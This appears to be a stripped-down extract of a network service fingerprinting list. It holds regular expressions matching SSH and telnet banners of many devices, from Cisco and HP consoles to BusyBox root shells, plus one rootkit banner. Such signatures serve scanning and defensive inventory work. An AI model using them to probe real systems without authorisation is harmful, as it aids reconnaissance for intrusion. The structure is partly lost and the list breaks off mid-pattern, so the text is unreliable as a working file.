+SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-portable-overwrite-base +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD-openssh-gssapi- +SSH-([\d.]+)-OpenSSH_([\w._-]+) FreeBSD\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) miniBSD-([\d]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) NetBSD_Secure_Shell-([\w._-]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)_Mikrotik_v([\d.]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) in RemotelyAnywhere ([\d.]+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)\+CAN-2004-0175\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+) NCSA_GSSAPI_20040818 KRB5\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn\w+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+\+sftpfilecontrol-v[\d.]+-hpn\w+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn) NCSA_GSSAPI_\d+ KRB5\r?\n +SSH-([\d.]+)-OpenSSH_3\.4\+p1\+gssapi\+OpenSSH_3\.7\.1buf_fix\+2006100301\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+\.RL)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-CERN\d+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+\.cern-hpn) +SSH-([\d.]+)-OpenSSH_([\w._-]+-hpn)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+-pwexp\d+)\r?\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)-chrootssh\n +SSH-([\d.]+)-Nortel\r?\n +SSH-([\d.]+)-OpenSSH_([\w_.-]+) DragonFly-\d+\r?\n +SSH-([\d.]+)-OpenSSH_([\w_.-]+) FIPS\n +\0\0\0\\0\0\0\0\x01\0\0\0\x1bNo host key is configured!\n\r!\"v +SSH-(\d[\d.]+)-SSF-(\d[-.\w]+)\r?\n +SSH-(\d[\d.]+)-lshd_(\d[-.\w]+) lsh - a free ssh\r\n\0\0 +SSH-(\d[\d.]+)-lshd-(\d[-.\w]+) lsh - a GNU ssh\r\n\0\0 +SSH-([\d.]+)-Sun_SSH_(\S+) +SSH-([\d.]+)-meow roototkt by rebel +SSH-(\d[\d.]*)-(AKAMAI-I*)\r?\n +SSH-(\d[\d.]*)-(Server-V)\r?\n +SSH-(\d[\d.]*)-(Server-VI)\r?\n +SSH-(\d[\d.]*)-(Server-VII)\r?\n +SSH-(\d[\d.]+)-Cisco-(\d[\d.]+)\r?\n +\r\nDestination server does not have Ssh activated\.\r\nContact Cisco Systems, Inc to purchase a\r\nlicense key to activate Ssh\.\r\n +SSH-2\.0-0\.0 \r?\n +SSH-([\d.]+)-([\w.]+) VShell\r?\n +SSH-([\d.]+)-([\w.]+) \(beta\) VShell\r?\n +SSH-([\d.]+)-(\d[-.\w]+) sshlib: WinSSHD (\d[-.\w]+)\r?\n +SSH-([\d.]+)-(\d[-.\w]+) sshlib: WinSSHD\r?\n +SSH-([\d.]+)-([\w._-]+) sshlib: sshlibSrSshServer ([\w._-]+)\r\n +SSH-([\d.]+)-([\w._-]+) sshlib: GlobalScape\r?\n +SSH-([\d.]+)-([\w._-]+) sshlib: EdmzSshDaemon ([\w._-]+)\r\n +SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD ([\w._-]+)\r\n +SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD ([\w._-]+): free only for personal non-commercial use\r\n +SSH-([\d.]+)-([\w._-]+) FlowSsh: WinSSHD: free only for personal non-commercial use\r\n +SSH-1\.5-X\r?\n +Access to service sshd from [-\w_.]+@[-\w_.]+ has been denied\.\r\n +SSH-([\d.]+)-FortiSSH_([\d.]+)\r?\n +SSH-([\d.]+)-cryptlib\r?\n +SSH-2\.0-1\.0 Radware SSH \r?\n +SSH-2\.0-(\d{8,12})\r?\n +SSH-2\.0-Twisted\r?\n +SSH-2\.0-PGP\r?\n +SSH-([\d.]+)-libssh-([-\w.]+)\r?\n +SSH-([\d.]+)-HUAWEI-VRP([\d.]+)\r?\n +SSH-([\d.]+)-VRP-([\d.]+)\r?\n +SSH-([\d.]+)-lancom\r?\n +SSH-([\d.]+)-xxxxxxx\r?\n| p|Fortinet VPN/firewall sshd +SSH-([\d.]+)-AOS_SSH\r?\n +SSH-([\d.]+)-RedlineNetworksSSH_([\d.]+) Derived_From_OpenSSH-([\d.])+\r?\n +SSH-([\d.]+)-DLink Corp\. SSH server ver ([\d.]+)\r?\n +SSH-([\d.]+)-FreSSH\.([\d.]+)\r?\n +SSH-([\d.]+)-Neteyes-C-Series_([\d.]+)\r?\n +SSH-([\d.]+)-IPSSH-([\d.]+)\r?\n| p|Cisco/3com IPSSHd +SSH-([\d.]+)-DigiSSH_([\d.]+)\r?\n +SSH-([\d.]+)-0 Tasman Networks Inc\.\r?\n +SSH-([\d.]+)-([\w.]+)rad\r?\n +SSH-([\d.]+)-OpenSSH_([\d.]+) in DesktopAuthority ([\d.]+)\r?\n +SSH-1\.5-SSH\.0\.1\r?\n +SSH-([\d.]+)-Ingrian_SSH\r?\n +SSH-([\d.]+)-PSFTPd PE\. Secure FTP Server ready\r?\n +SSH-([\d.]+)-BlueArcSSH_([\d.]+)\r?\n +SSH-([\d.]+)-Zyxel SSH server\r?\n +SSH-([\d.]+)-paramiko_([\w._-]+)\r?\n +SSH-2\.0-SSH_0\.2\r?\n +SSH-([\d.]+)-CoreFTP-([\w._-]+)\r?\n +SSH-([\d.]+)-RomSShell_([\w._-]+)\r\n +Could not load host key\. Closing connection\.\.\. +SSH-([\d.]+)-WS_FTP-SSH_([\w._-]+)(?: FIPS)?\r\n +SSH-([\d.]+)-http://www\.sshtools\.com J2SSH \[SERVER\]\r\n +SSH-([\d.]+)-DraySSH_([\w._-]+)\n\n\rNo connection is available now\. Try again later! +SSH-([\d.]+)-Pragma FortressSSH ([\d.]+)\n +SSH-([\d.]+)-SysaxSSH_([\d.]+)\r\n +SSH-([\d.]+)-1\.00\r\n +SSH-([\d.]+)-Foxit-WAC-Server-([\d.]+ Build \d+)\n +SSH-([\d.]+)-ROSSSH\r\n +SSH-([\d.]+)-3Com OS-([\w._-]+ Release \w+)\n +SSH-([\d.]+)-3Com OS-3Com OS V([\w._-]+)\n +SSH-([\d.]+)-XXXX\r\n +SSH-([\d.]+)-xxx\r\n +SSH-([\d.]+)-OpenSSH_([\w._-]+)-HipServ\n +SSH-([\d.]+)-xlightftpd_release_([\w._-]+)\r\n +SSH-([\d.]+)-Serv-U_([\w._-]+)\r\n +SSH-([\d.]+)-CerberusFTPServer_([\w._-]+)\r\n +Soldat Admin Connection Established\.\r\nPassword request timed out\.\r\n +unknown command \r\nunknown command \r\n +\* OK SSP MagniComp SysInfo Server ([\w._-]+)\n +RPY \d \d \. \d \d+\r\nContent-Type: application/beep\+xml\r\n +\0\0\0\x0bSynergy\0\x01\0 +\x80\0\0\\0\0\0\x01I\xae\xeb\xc1\0\0\0\0\0\0\x05\x02\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x04\0\0\0\" +USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND\n +You are not welcome to use (\w+) from [\w._-]+\.\n +welcome userid=\d+ servername=\"([^"]+)\" motd=\"\" forwarding=\d+ channels=\d+ operators=\d+ maxusers=\d+ protocol=\"([\d.]+)\"\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f +\xff\xfd\x18\xff\xfb\x01\n\r\n\rPassword: +\xff\xfc\x01\r\nPlease type \[Return\] two times, to initialize telnet configuration\r\nFor HELP type \"\?\"\r\n> +\x1b\[H\x1b\[2JYou have connected to a FirstClass System\. Please login\.\.\.\r\nUserID: +\xff\xfb\x03\xff\xfb\x01\r\nCopyright \d+ Sun Microsystems, Inc\. All rights reserved\.\r\nUse is subject to license terms\.\r\n\r\n\r\nSun\(tm\) Advanced Lights Out Manager ([\d.]+) \(([\w._-]+)\)\r\n\r\nPlease login: +\xff\xfb\x01\xff\xfb\x01Connected to [-/.+\w]+!\r\n\r\nPassword: +220 SL4NT viewer service ready\r\n250 Currently connected channels: +\xff\xfb\x03\xff\xfb\0\xff\xfb\0\xff\xfd\0\xff.*\r\rFrontDoor (\d[-.\w]+)/ +\xff\xfb\x01\xff\xfb\x03\r\nOK\r\n +\xff\xfb\x03\xff\xfd\x03\xff\xfc\x06.*\nPrecidia Technologies\r\n([-.+\w]+) Remote Configuration\r\n\nPassword\? +\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01WinCE/WBT Command Shell Version (\d[-.\w]+)\r\nSerial Number: (\w+) MAC Address: 0000(\w+)\r\nUUID: [-\w]+\r\nPassword: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[2J\x1b\[Hname: +\xff\xfb\x01\n\r-> \x08\x08\x08\x08 \*\*\* EPSON Network Scanner Server \((.*)\) \*\*\*\n\r\n\r\x08\x08\x08\x08 \n\r +\xff\xfb\x01\r\nNetportExpress\(tm\) ([-/.+\w]+)\r\n.*\r\n\r\nlogin: +login: \xff\xfd\x03\xff\xfb\x03\xff\xfb\x01 +\xff\xfb\x01\r\npassword: +\xff\xfb\x01\xff\xfd\x18\xff\xfd# +\xff\xfb\x03\xff\xfb\x01\r\nPassword: +\x1b\[20;1H\r\n\r\x1b\[\?25h\x1b\[20;11H\x1b\[21;1HSession Terminated, Connect again\r\n\r\x1b\[\?25h\x1b\[21;1H\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[[34];23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HHP [-.\w]+ ProCurve Switch ([-.\w]+)\r\n\rFirmware revision ([-.\w]+)\r\n\r\r +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r.*Procurve Wireless Access Point (\d+)\r\n +Check Point FireWall-1 Client Authentication Server running on [-.\w]+\r\n\r\xff\xfb\x01\xff\xfe\x01\xff\xfb\x03User: +\xff\xfb\x01\xff\xfb\x03\r\nUsername: +\xff\xfd%\xff\xfb\x01\xff\xfd\x03\xff\xfd\x1f\xff\xfd\0\xff\xfb\0 +\xff\xfd\x03\xff\xfb\x03\xff\xfd'\xff\xfd\x18\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfe\x01GUI START\n +\xff\xfd'\xff\xfd\x18| p|IBM OS/400 telnetd| o|OS/400 +\xff\xfb\x03\xff\xfb\x01\x07HP JetDirect\r\nPassword is not set\r\n +\xff\xfb\x03\xff\xfb\x01\x07HP JetDirect\r\n\r\nEnter username: +\xff\xfd\x03\xff\xfb\x01\xff\xfd!| p|HP MPE/iX telnetd +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nIQinVision IQeye3 Version ([vV].*)\n\r\nType HELP +\xff\xfe%\xff\xfd\x18 +\r\nEfficient ([-.\w ]+) Router \(([-.\d/]+)\) v(\d[-.\w]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Login: +\r\nRaptor Firewall Secure Gateway\.\r\n +\r\nSynchronet BBS for Win32 Version (\d[-.\w]+)\r\n +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b.*BayStack ([-\w_.]+) .*HW:(\w+) FW:V([\d.]+) SW:V([\d.]+)\x1b +\xff\xfb\x01\x1b\[2J\x1b\[58259456;1H\x1b\[0m\x1b\[1;1H \*\*\*\*\* \*\*\* \* \* \*\*\*\*\* \*\*\*\*\*\*\*\*\* \*\*\* \*\*\*\*\* \* \*\x1b\[2;1H +\xff\xfb\x01\n\r\n.*Bay Networks (Bay[-.: \w]+)\n\r +Check Point FireWall-1 authenticated Telnet server running on +\xff\xfb\x01\r\n\rType \"\?\" at the command prompt for a list of commands\.\n\r.*Command-> +\xff\xfb\x01\x1b\[0m\x1b\[2J\x1b\[0m\x1b\[9;20HCopyright\(C\) 1995-99 D-Link Systems Inc\.\x1b\[13;30HUser Name\x1b\[14;30HPassword\x1b\[23;10HMAC Address:\x1b\[8;29H([-.\w]+) Console Program\x1b\[13;41H +\xff\xfa\x18\x01\xff\xf0\xff\xfb\x01\xff\xfb\x03Ambit Cable Router\r\n\r\nLogin: +\n\rVina Technologies (.*) \((\d[-.\w]+ build \d+)\) +\xff\xfd\x03\xff\xfb\x03\xff\xfb\x01\x1b\[0m\x1b\[1;1H\x1b\[2J\rD\r \n\r (DES-.*) Command Line Interface\n\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfc\x1f\n\r\n\rUser Access Verification\n\r\n\r\n\r\n\r\n\rShell version (\d\S+).*Maipu Communication Technology Co\. +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\x1b.*Intel Corporation, ([-+. \w()]+) +\r\nFlowPoint/(.*) Ready\r\n.*\xff\xfb\x01\xff\xfb +Tenor Multipath Switch CDR Server\r\nConnected from IpAddr/Port# [\d.]+/\d+ to Port# \d+\r\nPassword: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\x0d\x0a\x0d\x0aCisco\x20Systems.*Console/Telnet Access of the ([-. \w]+) for Configuration Purposes +\xff\xfb\x01\n\r\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08 \x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08 +\r\n\r\nUser Access Verification\r\nPassword:\xff\xfb\x01 +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01.*\r\nUser Access Verification\r\n\r\nPassword: +\xff\xfb\x01\r\r\nUser Access Verification\r\r\n\r\r\nUsername: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\r\n\r\nCisco Systems Console\r\n +\xff\xfd\x18 +\xff\xfd\x18\xff\xfd\x1f\xff\xfd#\xff\xfd'\xff\xfd\ +\xff\xfb\x01\n\rUser Name : +\xff\xfd\ +\xff\xfb\x01\xff\xfb\x03\xff\xfe\x01\n\rlogin: +\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\n\r\nUsername: +\xff\xfd\x18\xff\xfd \xff\xfd#\xff\xfd'\xff\xfd\| p|Openwall GNU/*/Linux telnetd +\xff\xfc\x01\r\nHP JetDirect\r\n\r\nPlease type \"\?\" for HELP, or \"/\" for current settings\r\n> +\xff\xfb\x01\xff\xfb\x03\r\nAXIS (\S+) TELNET +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03.*?FORE\x20Systems,\x20FORE\x20ES-2810.*?Version (\d[\d\.-]+) +\xff\xfb\x03\xff\xfb\x01.*ForeRunner ES-3810.*Enter Username: +\xff\xfb\x01\r\nCopyright \(C\) 1999 by Extreme Networks\r\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03.*?ES-1000\x20Fast\x20Ethernet\x20Switch\x20Console +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05Welcome to ([-\w_]+) Debug Terminal - \d*\n\r\n\r\n\rlogin: +\x1b\[0m\x1b\[2J\x1b\[01;28HCONEXANT SYSTEMS, INC\.\x1b\[02;19H ACCESS RUNNER ADSL CONSOLE PORT\x1b\[24;01H>>>\x1b\[24;01HLOGON PASSWORD>\x1b\[02;53H3\.\d+\x1b\[24;17H\x1b\[24;17H\x1b\[24;17H\x1b\[24;17H +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\r\nWelcome on (.*)\r\n\r\n\r\nUsername: +\xff\xfb\x01\xff\xfd\x18\nTelnet Service on the PrintServer\n\n\rPassword: | p|Hawking/TRENDnet Print Server telnetd +\xff\xfb\x01\xff\xfb\x03\r\n\r\n Welcome to OpenVMS \(TM\) Alpha Operating System, Version V([\d.]+) \r\n\r\n\rUsername: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\xff\xfd \xff\xfd!\x07\r\n\r\n Welcome to OpenVMS \(TM\) Alpha Operating System, Version V([-\w_.]+) \r\n\r\n\rUsername: +\xff\xfd\(| p|IBM OS/390 or SNA telnetd +\xff\xfb\r\nRemotelyAnywhere Telnet Server v([\d.]+)\r\n.*\r\n\r\n([-\w_. ]+) login\r\nuser name: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x1f\xff\xfd\x18([^\r\n]+)\r\nRemotelyAnywhere Telnet Server ([\d.]+)\r\n.*\r\n\r\n([-\w_. ]+) login\r\nuser name: +\r\nVxWorks login: \xff\xfb\x01 +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\nSelect Access Level\r\n===================\r\n1 - Read-Only\r\n2 - Installer\r\n3 - Administrator\r\n13008 >>> +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nExterior router [-\w_.]+\r\nType: Cisco 2651\r\nModule: E3/T3 interface\r\n\r\n +\xff\xfe\x01\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x18Georgia SoftWorks Telnet Server for Windows NT/2000/XP/2003/Vista Ver\. ([-\w_.]+)\n\r +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\r\n\r\nCisco Systems, Inc\. Console\r\n\r\n\r\n\r\r\n\r\nUsername: +\xff\xfb\x01\xff\xfb\x03\r\n\r\n\[ORiNOCO-AP-(\d+)[-\d]*\]> Please enter password: +\xff\xfb\xfd\xff\xfb\x01\n\r\n\rFabric OS \(tm\) Release v([\w.]+)\n\r\n\r +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nLantronix MSS100 Version V([\d.]+)/\d+\(\d+\)\n\r\nType HELP at the 'Local_2> ' prompt for assistance\.\n\r\n\r\n\nUsername> +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\0\r\0\r\n\x07# \0 +\xff\xfb\x01OPTIBASE MGW5100 COMMAND LINE INTERFACE\r\n +PC Telnetd ([\d.]+)\r\n\r\nlogin: +rsconfig: port rose not active\n\xff\xfd\"\r\nLinuxNode v([\d.]+) \(([-\w_.]+)\)\r\n\r\nlogin: +\xff\xfd\"\r\nLinuxNode v([\d.]+) \(([-\w_.]+)\)\r\n\r\nlogin: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) Built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n# +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) Built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n/bin # +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\nermittle die aktuelle TTY\r\ntty is \"/dev/pts/0\"\r\nConsole Ausgaben auf dieses Terminal umgelenkt\r\n# +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \(2006\.02\.15-21:18\+0000\) Built-in shell \(msh\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n# +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nRouter> +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nAmiNET\d+ login: +\xff\xfb\x03\xff\xfb\x01\r\n\r\n\x07HP (\w+) Ethernet SNMP Module\r\n ROM B\.([\d.]+)\r\n EEPROM A\.([\d.]+)\r\n HW B\.([\d.]+)\r\n\r\nEnter password: +USR5450 Telnet server v([\d.]+)\n\r\nPassword : +\xff\xfd\x03\xff\xfb\x03\xff\xfd\x01\xff\xfb\x01\d\d-\w+-\d+ \d\d:\d\d:\d\d %MSCM-I-NEWTERM: New TELNET connection from (?:[\d.]+)\r\r\nPassword: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\0\n\nLantronix ETS16 Version V([\d.]+)/\d+\(\d+\)\n\r\0\nType HELP at the 'BRTR-ETS16>' prompt for assistance\.\n\r\0\nUsername> +\r\nWelcome to slush\. \(Version ([\d.]+)\)\r\n\r\n\r\n\xff\xfb\x01\xff\xfb\x03([-\w_. ]+) login: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0m\x1b\[2J\x1b\[0m\x1b\[2J\x1b\[2;66H\x1b\[1m\x1b\[21;1H\x1b\[0m-+\x1b\[22;2H\x1b\[0mFunction:\x1b\[23;2H\x1b\[0mMessage:\x1b\[24;2H\x1b\[7mCTRL\+R = Refresh +\x1b\[8;12H\x1b\[0mIBM BladeCenter 4-Port Gb Ethernet Switch Module Console +\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0;1H\x1b\[J\x1b\[1;1H\x1b\[0;1H\x1b\[J\x1b\[1;1H\x1b\[0m =+\r\n AT-8326GB Management System Version ([\d.]+) \r\n Remote - Telnet\r\n +\r\nEfficient 5851 SDSL \[ATM\] Router \(5851-\d+\) v([-\d.]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Login: +NPC Telnet permit one connection\.\r\n But One connection\(\) already keep alive\.\r\nGood Bye !! \r\n +\xff\xfb\x01\r\nWelcome to NetLinx v([\d.]+) Copyright AMX Corp\. \d+-\d+\r\n> +\r\nSiemens \d+ T1E1 \[COMBO\] Router \(([-\d]+)\) v([\d.]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Username: +\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[4;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HCopyright \(C\) 1991-1994 Hewlett-Packard Co\. All Rights Reserved\. +\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfb\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05\r\nCLI access not allowed until the SCC is active\.\r\n\r\n +\xff\xfb\x01\n?\r\n\r?VxWorks login: +\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\nVxWorks login: +\xff\xfb\x01\r\n\rPassword: | p|ZyXEL Prestige/Efficient Speedstream adsl router telnetd +\xff\xfb\x03\xff\xfb\x01password: +\r\n\xff\xfb\x01Enter password: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\w+ login: +\xff\xfb\x01\xff\xfb\x03\r\n\(\w+\) \r\nUser: +login: \xff\xfb\x01\xff\xfb\x03| p|USRobotics/Sagem router telnetd +\xff\xfb\x01\xff\xfb\x03\xff\xfb\0\xff\xfd\0login: +220 FTP server \(ver 1\.0\) ready\.\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on dslmodem login: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x1f\xff\xfd\x18 +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nlogin: +\r\nSystem unavailable\. Please try later\.\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n(FVS\w+) login: +\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03Login Name: +\xff\xfb\x01\xff\xfe\"\r\n\* +\xff\xfb\x03\xff\xfb\x01\r\n Disconnecting\.\.\.\r\n\n +\xff\xfb\x01\xff\xfb\x03\x1b\[2J\x1b\[0;0H\x1b\[K\x1b\[7mTelnet configuration RELEASE ([\d.]+)\x1b +Telnet server disabled\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfb\x01\xff\xfb\x03\r\r\n([\w._-]+) login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfb\x01\xff\xfb\x03([\w._-]+) login: +\r\n.*Based\(loosely\) on CircleMUD ([\d.]+) +\r\n.*Based on CircleMUD ([\w._-]+),\r\n +\x1b\[0;37;40m\x1b\[2J\x1b\[0;37;40m\x1b\[1m\x1b\[15;22HAT-(\w+), version ([\d.]+)\x1b +\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0;0H\x1b\[0J\x1b\[0;0H\x1b\[0J\x1b\[1;28HAT-([-\w_.]+) Login Menu\x1b\[5;18HAT-[-\w_.]+ Local Management System Version ([\d.]+) \x1b +\xff\xfd\x03\xff\xfb\x01\x1b\[2J\x1b\[1;1H\x1b\[0m\x1b\[\?3l\x1b\(0\x1b\[2;40H\x1b\(B\x1b\(0\x1b\[2;28H\x1b\(BCSX([-\w_.]+) Local Management\x1b\[0m\x1b\(0\x1b\[5;24H\x1b\(BCABLETRON Systems, Incorporated\x1b +\xff\xfb\x01\n\rno data rcvd for version string\n\rrecv version id unsuccessful\n\rSSH Session task 0x\w+: Version Exchange Failed\n\r +\r\nSorry, this system is engaged\.\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on \(none\) login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on ([-\w_.]+) login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \( +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\nBusyBox v(.*) Built-in shell \(ash\)\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\(none\) login: +\xff\xfb\x01Hummingbird Communications Ltd\., Windows NT, Telnetd Version ([\d.]+) \(([-\w_.]+)\)\r\n\r\n login: +\xff\xfb\x01\xff\xfb\x03\r\nUser Access Verification\r\n\r\nPlease Enter Login Name: +\xff\xfb\x01\xff\xfb\x03\r\nUser Access Verification\r\n\r\nPlease Enter Password: +\xff\xfb\x01\xff\xfb\x03BR-telnet@FI_Core> +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\x1b\[\?3l\x1b\[2JPlease enter your user name and password!! \r\n\r\nLogin: +\xff\xfb\x01\r\nD-Link Access Point login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03.*\r\n([-\w_.]+) login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Login failed\.\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\nPON 262194 PAAMCO (TA \w+) Gen3\r\n\n\n\ruser: +\xff\xfd\x03\xff\xfb\x03\xff\xfd\x01\xff\xfb\x01\r\n\r\r\nUser Name: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r +\*+\n\r +Welcome to ([-\w_.]+)\n\r +\*+\n\r\n\rD-Link Corp\., Inc\. Software Release ([-\w_.)(/]+)\n\rCopyright \(c\) \d+-\d+ by D-Link Corp\., Inc\.\n\r\n\rlogin: +\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\nUsing telnet exposes your password\. Using ssh is a safer choice\.\r\n\r\nUsername: +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01\r\n\r\nPIX passwd: +\xff\xfb\x01\r\n#-+\r\n# Tasman Networks Inc\. Telnet Login\r\n# +\xff\xfd\x03\xff\xfb\x01\r\n\r\n\t\tWelcome to P333R\r\n\t\tSW version ([\d.]+)\r\n\r\n\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPLi dm7000 Helenite \d+ \(based on [-\w_.]+\)\r\n\rwelcome on your dreambox! - Kernel ([-\w_.]+) +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r[ *\r\n]*Welcome on your dreambox! - Kernel (\d[\w.]+) +\xff\xfe\"\xff\xfb\x01 \x1b\[H\x1b\[J\x1b\[3;1HCB-1000 S/N: (\d+)\x1b\[3;56HSymbol Technologies, Inc\.\x1b\[4;1HVersion ([-\w_.]+)\x1b\[4;44HEthernet HW address ([\w:]+)\x1b\[21;1H +\x1b\[\?25l\xff\xfb\x01\x1b\[2J\x1b\[0m\x1b\[1;1H\x1b\[2;1H\x1b\[3;1H\x1b\[4;1H ### ### ########### ########## ############# ########### ###\x1b\[5;1H #### ### ############# ############ ############# ########### ###\x1b\[6;1H[ #]{70}\x1b\[7;1H[ #]{70}\x1b\[8;1H[ #]{70}\x1b\[9;1H[ #]{70}\x1b\[10;1H[ #]{70}\x1b\[11;1H[ #]{70}\x1b\[12;1H[ #]{78}\x1b\[13;1H[ #]{78}\x1b\[14;1H\x1b\[15;1H\x1b\[16;1HEnter Ctrl-Y to begin\.\x1b\[18;3H\*{35} +\xff\xfb\x01\x1b\[2J\x1b\[0m\x1b\[1;1H 